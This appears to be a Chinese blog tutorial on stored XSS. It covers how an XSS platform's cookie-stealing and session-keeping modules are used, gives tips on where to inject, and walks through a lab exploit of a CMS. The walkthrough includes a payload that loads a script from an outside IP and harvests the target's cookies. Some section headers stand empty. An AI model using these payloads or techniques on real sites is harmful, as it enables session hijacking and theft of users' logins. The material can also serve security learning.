大家好,欢迎来到IT知识分享网。
一、存储型XSS简介
(一)存储型XSS的概念
(二)存储型XSS攻击过程
<script>alert(1)</script>)
这样当其他用户访问留言板时,就会看到一个弹窗。可以看到,存储型XSS的攻击方式能够将恶意代码永久地存入数据库或者文件中,相当于将代码嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射型XSS攻击将没有多大作为,而存储型XSS则不同,由于它注入在一些我们非常信任的页面中,因此无论我们多么小心,都难免会受到攻击。
(三)打XSS的潜在风险
用前台打后台有可能会把页面插崩,所以在没有明确书面授权的情况下,最好是谨慎去做。正常情况下XSS不会把页面搞崩,比如像这样主动把标签闭合掉<script></script>一般就不会把网页插崩,但是只插入<script>就有可能会崩。
而且在打XSS时,如果前台没有过滤的信息,基本上后台也不会过滤了。
二、XSS平台使用方法
看到主界面有很多的模块,最常用的是基础默认模块和超强模块。
超强模块中,keepseesion参数是指保持会话,每隔一段时间会自动向目标网站发包,相当于告诉网站,我还在线,请保持cookie的时效性。
注意:图片探测功能虽然不能偷cookie,但是可以偷对方的真实ip。
有些网站会限制文本框的输入长度,因此XSS的payload最好的越短越好。
如果没有长度限制,先打传统的payload,有长度限制再打这种短的。如果别的都打不了,就尝试打图片探测。运气好说不定能获得目标网站的后台登陆页面呢。
对于输入信息执行后,该信息若消失不见,很有可能是被当成代码解析了,XSS生效。在注册用户的用户名那里往往很容易存在XSS,甚至上传文件的文件名,也能拿来打XSS。
作为网站管理者,按F12进入检查页面,在来源那里如果看到一个未知的域名,则往往存在攻击者传来的XSS。
三、靶场实战
说了那么多,当然要实战一下了!首先进入靶场:
在靶场底部看到了该cms的版本号,因此去百度搜索该cms的通杀漏洞:
看到一个存储型XSS漏洞,通过查看该文章了解该漏洞的利用过程,然后去靶场复现。为了避免谷歌浏览器的安全机制导致漏洞复现失败,因此改用火狐浏览器去操作。在浏览器中输入:
http://59.63.166.75:8082/index.php?c=m&m=a <script>alert(1)</script>
成功弹窗。
实际上这里的c和m的值怎么填都可以,但是传参名得是c和m,具体是为什么,我也不清楚,这肯定是跟源码的代码审计有关了。我们只要知道怎么用就行了。
复制XSS平台生成的攻击代码,插入到网址后面,如下:
http://59.63.166.75:8082/index.php?c=m&m=a </textarea>'"><script src=http://101.43.103.25/xsser/r1AsOY></script>
看到收到了目标网站的cookie信息。
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/111311.html





